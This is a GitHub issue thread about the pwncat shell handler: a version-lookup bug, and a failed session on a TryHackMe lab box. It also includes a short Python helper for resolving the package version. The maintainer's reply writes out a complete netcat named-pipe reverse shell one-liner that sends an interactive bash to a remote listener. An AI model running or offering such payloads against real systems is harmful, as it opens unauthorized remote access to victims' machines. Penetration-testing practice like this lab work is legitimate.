calebstewart / pwncat

Fancy reverse and bind shell handler
https://pwncat.readthedocs.io
MIT License

importlib.metadata.PackageNotFoundError: pwncat #222

Closed diegoxcn closed 2 years ago

diegoxcn commented 2 years ago

Hi, I'm new to this tool. But after installation it seems to fail to capture an active session, and it gives this error message when I try to check the version I installed.

Bug Description

╰─λ pwncat-cs --version                                                                     0 (0.752s)
Traceback (most recent call last):
  File "/home/user/.local/bin/pwncat-cs", line 8, in <module>
    sys.exit(main())
  File "/home/user/.local/lib/python3.9/site-packages/pwncat/__main__.py", line 104, in main
    print(importlib.metadata.version("pwncat"))
  File "/usr/lib/python3.9/importlib/metadata.py", line 551, in version
    return distribution(distribution_name).version
  File "/usr/lib/python3.9/importlib/metadata.py", line 524, in distribution
    return Distribution.from_name(distribution_name)
  File "/usr/lib/python3.9/importlib/metadata.py", line 187, in from_name
    raise PackageNotFoundError(name)
importlib.metadata.PackageNotFoundError: pwncat

pwncat version

I installed pwncat-cs by pip

╰─λ pip3 install pwncat-cs                                                                  0 (2.131s)
Defaulting to user installation because normal site-packages is not writeable
Collecting pwncat-cs
  Using cached pwncat_cs-0.5.0-py3-none-any.whl (2.4 MB)
Requirement already satisfied: Jinja2<4.0.0,>=3.0.1 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (3.0.3)
Requirement already satisfied: pycryptodome<4.0.0,>=3.10.1 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (3.11.0)
Requirement already satisfied: prompt-toolkit<4.0.0,>=3.0.19 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (3.0.23)
Requirement already satisfied: zodburi<3.0.0,>=2.5.0 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (2.5.0)
Requirement already satisfied: packaging<21.0,>=20.9 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (20.9)
Requirement already satisfied: rich<11.0.0,>=10.4.0 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (10.15.1)
Requirement already satisfied: ZODB3<4.0.0,>=3.11.0 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (3.11.0)
Requirement already satisfied: requests<3.0.0,>=2.25.1 in /usr/lib/python3/dist-packages (from pwncat-cs) (2.25.1)
Requirement already satisfied: paramiko<3.0.0,>=2.7.2 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (2.8.0)
Requirement already satisfied: netifaces<0.12.0,>=0.11.0 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (0.11.0)
Requirement already satisfied: python-rapidjson<2.0,>=1.0 in /home/user/.local/lib/python3.9/site-packages (from pwncat-cs) (1.5)
Requirement already satisfied: MarkupSafe>=2.0 in /home/user/.local/lib/python3.9/site-packages (from Jinja2<4.0.0,>=3.0.1->pwncat-cs) (2.0.1)
Requirement already satisfied: pyparsing>=2.0.2 in /usr/lib/python3/dist-packages (from packaging<21.0,>=20.9->pwncat-cs) (2.4.7)
Requirement already satisfied: cryptography>=2.5 in /usr/lib/python3/dist-packages (from paramiko<3.0.0,>=2.7.2->pwncat-cs) (3.3.2)
Requirement already satisfied: pynacl>=1.0.1 in /usr/lib/python3/dist-packages (from paramiko<3.0.0,>=2.7.2->pwncat-cs) (1.4.0)
Requirement already satisfied: bcrypt>=3.1.3 in /home/user/.local/lib/python3.9/site-packages (from paramiko<3.0.0,>=2.7.2->pwncat-cs) (3.2.0)
Requirement already satisfied: wcwidth in /home/user/.local/lib/python3.9/site-packages (from prompt-toolkit<4.0.0,>=3.0.19->pwncat-cs) (0.2.5)
Requirement already satisfied: pygments<3.0.0,>=2.6.0 in /home/user/.local/lib/python3.9/site-packages (from rich<11.0.0,>=10.4.0->pwncat-cs) (2.10.0)
Requirement already satisfied: colorama<0.5.0,>=0.4.0 in /usr/lib/python3/dist-packages (from rich<11.0.0,>=10.4.0->pwncat-cs) (0.4.4)
Requirement already satisfied: commonmark<0.10.0,>=0.9.0 in /home/user/.local/lib/python3.9/site-packages (from rich<11.0.0,>=10.4.0->pwncat-cs) (0.9.1)
Requirement already satisfied: transaction in /home/user/.local/lib/python3.9/site-packages (from ZODB3<4.0.0,>=3.11.0->pwncat-cs) (3.0.1)
Requirement already satisfied: ZEO>=4.0.0dev in /home/user/.local/lib/python3.9/site-packages (from ZODB3<4.0.0,>=3.11.0->pwncat-cs) (5.2.3)
Requirement already satisfied: ZODB>=4.0.0dev in /home/user/.local/lib/python3.9/site-packages (from ZODB3<4.0.0,>=3.11.0->pwncat-cs) (5.6.0)
Requirement already satisfied: BTrees>=4.0.0dev in /home/user/.local/lib/python3.9/site-packages (from ZODB3<4.0.0,>=3.11.0->pwncat-cs) (4.9.2)
Requirement already satisfied: persistent>=4.0.0dev in /home/user/.local/lib/python3.9/site-packages (from ZODB3<4.0.0,>=3.11.0->pwncat-cs) (4.7.0)
Requirement already satisfied: ZConfig in /home/user/.local/lib/python3.9/site-packages (from zodburi<3.0.0,>=2.5.0->pwncat-cs) (3.6.0)
Requirement already satisfied: six>=1.4.1 in /usr/lib/python3/dist-packages (from bcrypt>=3.1.3->paramiko<3.0.0,>=2.7.2->pwncat-cs) (1.16.0)
Requirement already satisfied: cffi>=1.1 in /home/user/.local/lib/python3.9/site-packages (from bcrypt>=3.1.3->paramiko<3.0.0,>=2.7.2->pwncat-cs) (1.14.6)
Requirement already satisfied: zope.interface>=5.0.0 in /home/user/.local/lib/python3.9/site-packages (from BTrees>=4.0.0dev->ZODB3<4.0.0,>=3.11.0->pwncat-cs) (5.4.0)
Requirement already satisfied: zdaemon in /home/user/.local/lib/python3.9/site-packages (from ZEO>=4.0.0dev->ZODB3<4.0.0,>=3.11.0->pwncat-cs) (4.3)
Requirement already satisfied: zc.lockfile in /home/user/.local/lib/python3.9/site-packages (from ZEO>=4.0.0dev->ZODB3<4.0.0,>=3.11.0->pwncat-cs) (2.0)
Requirement already satisfied: zodbpickle>=1.0.1 in /home/user/.local/lib/python3.9/site-packages (from ZODB>=4.0.0dev->ZODB3<4.0.0,>=3.11.0->pwncat-cs) (2.2.0)
Requirement already satisfied: pycparser in /home/user/.local/lib/python3.9/site-packages (from cffi>=1.1->bcrypt>=3.1.3->paramiko<3.0.0,>=2.7.2->pwncat-cs) (2.20)
Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from zodbpickle>=1.0.1->ZODB>=4.0.0dev->ZODB3<4.0.0,>=3.11.0->pwncat-cs) (52.0.0)
Installing collected packages: pwncat-cs
Successfully installed pwncat-cs-0.5.0

Target System (aka "victim")

TryHackMe Madness. Haven't tried on others yet.

Steps to Reproduce

Steps to reproduce the behavior:

On victim box:
1. nc 9001 | /bin/sh

On attack box:
1.

─λ pwncat-cs -Vlp 9001                                                                     1 (0.300s)
[13:02:00] Welcome to pwncat 🐈!                                                       __main__.py:164
[13:02:13] received connection from 10.10.149.96:40006                                      bind.py:84
[12/01/21 13:02:13] INFO      stty -echo nl lnext ^V ; export PS1=                       linux.py:1654
                    INFO      export PS1=;echo; echo w76oytTNDH; echo $$ 0</dev/null;    linux.py:1192
                             R=$?; echo EgpkDsimvF; echo $R; echo KE5fMGZsoT                          
[13:02:43] connection failed: channel receive timed out: b''                            manager.py:957

Expected Behavior

Version can show correct information; session can be captured.

calebstewart commented 2 years ago

The error you get when running --version is a known bug but shouldn't affect the functionality. It just affects using --version. I will push a fix for that in the next day or so.

Regarding the failed session, you aren't connecting standard output of the shell to the socket. You are connecting pwncat to the standard input of /bin/bash, but standard output is going to the terminal where you ran the nc command. pwncat needs to be able to see the output of the shell.

Long-story-short, you need to change your payload. https://www.revshells.com/ is a great resource for reverse and bind shell payloads. If you don't have the -e option for netcat, then you can select nc mkfifo from the list on the left, and bash for the shell, and then you should get a payload something like this:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.122.1 4444 >/tmp/f

Obviously, change the IP address and port number to your liking.

calebstewart commented 2 years ago

This has been fixed, and is now pushed to PyPI.
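
Added example, not part of the thread and not pwncat's own code: the traceback asks importlib.metadata for a distribution named pwncat while pip installed pwncat-cs, so, assuming that name mismatch is what raises PackageNotFoundError, the code below resolves the version from the import name instead of a hard-coded distribution name. The helper names and the constructed dist-info directory are hypothetical.

```python
import importlib.metadata as md
import tempfile
from pathlib import Path


def provided_imports(dist):
    """Top-level import names a distribution ships."""
    top = dist.read_text("top_level.txt")
    if top:
        return {line.strip() for line in top.splitlines() if line.strip()}
    # Some build backends omit top_level.txt; derive names from RECORD.
    names = set()
    for f in dist.files or []:
        first = f.parts[0]
        if first.endswith((".dist-info", ".egg-info", ".data")) or first == "..":
            continue
        names.add(first if len(f.parts) > 1 else f.stem)
    return names


def find_distribution(import_name, path=None):
    """(distribution name, version) providing `import_name`, else None."""
    kwargs = {} if path is None else {"path": path}
    for dist in md.distributions(**kwargs):
        if import_name in provided_imports(dist):
            return dist.metadata["Name"], dist.version
    return None


def safe_version(import_name, path=None):
    """String for a --version flag that never raises PackageNotFoundError."""
    found = find_distribution(import_name, path)
    return f"{found[0]} {found[1]}" if found else f"{import_name} (version unknown)"


def constructed_site(root, with_top_level=True):
    """Constructed sample mirroring the pip output in the report."""
    info = Path(root) / "pwncat_cs-0.5.0.dist-info"
    info.mkdir(parents=True)
    (info / "METADATA").write_text("Metadata-Version: 2.1\nName: pwncat-cs\nVersion: 0.5.0\n")
    if with_top_level:
        (info / "top_level.txt").write_text("pwncat\n")
    else:
        (info / "RECORD").write_text("pwncat/__init__.py,,\npwncat_cs-0.5.0.dist-info/METADATA,,\n")
    return [str(root)]


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        print(safe_version("pwncat", constructed_site(tmp)))  # pwncat-cs 0.5.0
```

Calling `find_distribution("pwncat")` without a path searches the running interpreter's own site-packages, which is a quick way to confirm which distribution name a user install actually registered.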